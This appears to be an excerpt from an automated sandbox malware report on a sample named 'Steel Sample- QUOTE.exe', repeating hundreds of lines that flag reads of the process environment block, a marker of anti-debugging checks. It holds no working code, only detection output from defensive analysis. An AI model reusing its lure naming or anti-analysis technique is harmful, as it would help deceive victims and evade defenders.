            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E375F mov eax, dword ptr fs:[00000030h]6_2_352E375F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E375F mov eax, dword ptr fs:[00000030h]6_2_352E375F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E375F mov eax, dword ptr fs:[00000030h]6_2_352E375F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E375F mov eax, dword ptr fs:[00000030h]6_2_352E375F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35313749 mov eax, dword ptr fs:[00000030h]6_2_35313749
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CF7AF mov eax, dword ptr fs:[00000030h]6_2_352CF7AF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CF7AF mov eax, dword ptr fs:[00000030h]6_2_352CF7AF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CF7AF mov eax, dword ptr fs:[00000030h]6_2_352CF7AF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CF7AF mov eax, dword ptr fs:[00000030h]6_2_352CF7AF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CF7AF mov eax, dword ptr fs:[00000030h]6_2_352CF7AF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C97A9 mov eax, dword ptr fs:[00000030h]6_2_352C97A9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353137B6 mov eax, dword ptr fs:[00000030h]6_2_353137B6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526D7B0 mov eax, dword ptr fs:[00000030h]6_2_3526D7B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]6_2_3523F7BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]6_2_3523F7BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]6_2_3523F7BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]6_2_3523F7BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]6_2_3523F7BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]6_2_3523F7BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]6_2_3523F7BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]6_2_3523F7BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F7BA mov eax, dword ptr fs:[00000030h]6_2_3523F7BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FD7B0 mov eax, dword ptr fs:[00000030h]6_2_352FD7B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FD7B0 mov eax, dword ptr fs:[00000030h]6_2_352FD7B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FF78A mov eax, dword ptr fs:[00000030h]6_2_352FF78A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524D7E0 mov ecx, dword ptr fs:[00000030h]6_2_3524D7E0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352457C0 mov eax, dword ptr fs:[00000030h]6_2_352457C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352457C0 mov eax, dword ptr fs:[00000030h]6_2_352457C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352457C0 mov eax, dword ptr fs:[00000030h]6_2_352457C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]6_2_3523F626
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]6_2_3523F626
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]6_2_3523F626
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]6_2_3523F626
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]6_2_3523F626
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]6_2_3523F626
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]6_2_3523F626
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]6_2_3523F626
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F626 mov eax, dword ptr fs:[00000030h]6_2_3523F626
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315636 mov eax, dword ptr fs:[00000030h]6_2_35315636
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35271607 mov eax, dword ptr fs:[00000030h]6_2_35271607
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527F603 mov eax, dword ptr fs:[00000030h]6_2_3527F603
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35243616 mov eax, dword ptr fs:[00000030h]6_2_35243616
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35243616 mov eax, dword ptr fs:[00000030h]6_2_35243616
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35279660 mov eax, dword ptr fs:[00000030h]6_2_35279660
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35279660 mov eax, dword ptr fs:[00000030h]6_2_35279660
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352DD660 mov eax, dword ptr fs:[00000030h]6_2_352DD660
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523D6AA mov eax, dword ptr fs:[00000030h]6_2_3523D6AA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523D6AA mov eax, dword ptr fs:[00000030h]6_2_3523D6AA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352376B2 mov eax, dword ptr fs:[00000030h]6_2_352376B2
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352376B2 mov eax, dword ptr fs:[00000030h]6_2_352376B2
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352376B2 mov eax, dword ptr fs:[00000030h]6_2_352376B2
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C368C mov eax, dword ptr fs:[00000030h]6_2_352C368C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C368C mov eax, dword ptr fs:[00000030h]6_2_352C368C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C368C mov eax, dword ptr fs:[00000030h]6_2_352C368C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C368C mov eax, dword ptr fs:[00000030h]6_2_352C368C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]6_2_352D36EE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]6_2_352D36EE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]6_2_352D36EE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]6_2_352D36EE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]6_2_352D36EE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D36EE mov eax, dword ptr fs:[00000030h]6_2_352D36EE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526D6E0 mov eax, dword ptr fs:[00000030h]6_2_3526D6E0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526D6E0 mov eax, dword ptr fs:[00000030h]6_2_3526D6E0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FD6F0 mov eax, dword ptr fs:[00000030h]6_2_352FD6F0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]6_2_3524B6C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]6_2_3524B6C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]6_2_3524B6C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]6_2_3524B6C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]6_2_3524B6C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]6_2_3524B6C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FF6C7 mov eax, dword ptr fs:[00000030h]6_2_352FF6C7
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352716CF mov eax, dword ptr fs:[00000030h]6_2_352716CF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353016CC mov eax, dword ptr fs:[00000030h]6_2_353016CC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353016CC mov eax, dword ptr fs:[00000030h]6_2_353016CC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353016CC mov eax, dword ptr fs:[00000030h]6_2_353016CC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353016CC mov eax, dword ptr fs:[00000030h]6_2_353016CC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35317120 mov eax, dword ptr fs:[00000030h]6_2_35317120
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35241131 mov eax, dword ptr fs:[00000030h]6_2_35241131
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35241131 mov eax, dword ptr fs:[00000030h]6_2_35241131
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B136 mov eax, dword ptr fs:[00000030h]6_2_3523B136
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B136 mov eax, dword ptr fs:[00000030h]6_2_3523B136
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B136 mov eax, dword ptr fs:[00000030h]6_2_3523B136
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B136 mov eax, dword ptr fs:[00000030h]6_2_3523B136
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D9179 mov eax, dword ptr fs:[00000030h]6_2_352D9179
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315152 mov eax, dword ptr fs:[00000030h]6_2_35315152
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239148 mov eax, dword ptr fs:[00000030h]6_2_35239148
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239148 mov eax, dword ptr fs:[00000030h]6_2_35239148
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239148 mov eax, dword ptr fs:[00000030h]6_2_35239148
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239148 mov eax, dword ptr fs:[00000030h]6_2_35239148
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D3140 mov eax, dword ptr fs:[00000030h]6_2_352D3140
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D3140 mov eax, dword ptr fs:[00000030h]6_2_352D3140
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D3140 mov eax, dword ptr fs:[00000030h]6_2_352D3140
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35247152 mov eax, dword ptr fs:[00000030h]6_2_35247152
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F11A4 mov eax, dword ptr fs:[00000030h]6_2_352F11A4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F11A4 mov eax, dword ptr fs:[00000030h]6_2_352F11A4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F11A4 mov eax, dword ptr fs:[00000030h]6_2_352F11A4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F11A4 mov eax, dword ptr fs:[00000030h]6_2_352F11A4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525B1B0 mov eax, dword ptr fs:[00000030h]6_2_3525B1B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F5180 mov eax, dword ptr fs:[00000030h]6_2_352F5180
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F5180 mov eax, dword ptr fs:[00000030h]6_2_352F5180
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35297190 mov eax, dword ptr fs:[00000030h]6_2_35297190
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352451ED mov eax, dword ptr fs:[00000030h]6_2_352451ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353131E1 mov eax, dword ptr fs:[00000030h]6_2_353131E1
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E71F9 mov esi, dword ptr fs:[00000030h]6_2_352E71F9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527D1D0 mov eax, dword ptr fs:[00000030h]6_2_3527D1D0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527D1D0 mov ecx, dword ptr fs:[00000030h]6_2_3527D1D0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353151CB mov eax, dword ptr fs:[00000030h]6_2_353151CB
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530903E mov eax, dword ptr fs:[00000030h]6_2_3530903E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530903E mov eax, dword ptr fs:[00000030h]6_2_3530903E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530903E mov eax, dword ptr fs:[00000030h]6_2_3530903E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530903E mov eax, dword ptr fs:[00000030h]6_2_3530903E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C106E mov eax, dword ptr fs:[00000030h]6_2_352C106E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315060 mov eax, dword ptr fs:[00000030h]6_2_35315060
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov ecx, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352BD070 mov ecx, dword ptr fs:[00000030h]6_2_352BD070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E705E mov ebx, dword ptr fs:[00000030h]6_2_352E705E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E705E mov eax, dword ptr fs:[00000030h]6_2_352E705E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526B052 mov eax, dword ptr fs:[00000030h]6_2_3526B052
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CD080 mov eax, dword ptr fs:[00000030h]6_2_352CD080
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CD080 mov eax, dword ptr fs:[00000030h]6_2_352CD080
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523D08D mov eax, dword ptr fs:[00000030h]6_2_3523D08D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35245096 mov eax, dword ptr fs:[00000030h]6_2_35245096
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526D090 mov eax, dword ptr fs:[00000030h]6_2_3526D090
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526D090 mov eax, dword ptr fs:[00000030h]6_2_3526D090
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527909C mov eax, dword ptr fs:[00000030h]6_2_3527909C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352650E4 mov eax, dword ptr fs:[00000030h]6_2_352650E4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352650E4 mov ecx, dword ptr fs:[00000030h]6_2_352650E4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov ecx, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov ecx, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov ecx, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov ecx, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353150D9 mov eax, dword ptr fs:[00000030h]6_2_353150D9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352BD0C0 mov eax, dword ptr fs:[00000030h]6_2_352BD0C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352BD0C0 mov eax, dword ptr fs:[00000030h]6_2_352BD0C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352690DB mov eax, dword ptr fs:[00000030h]6_2_352690DB
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F32A mov eax, dword ptr fs:[00000030h]6_2_3526F32A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35237330 mov eax, dword ptr fs:[00000030h]6_2_35237330
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530132D mov eax, dword ptr fs:[00000030h]6_2_3530132D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530132D mov eax, dword ptr fs:[00000030h]6_2_3530132D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C930B mov eax, dword ptr fs:[00000030h]6_2_352C930B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C930B mov eax, dword ptr fs:[00000030h]6_2_352C930B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C930B mov eax, dword ptr fs:[00000030h]6_2_352C930B
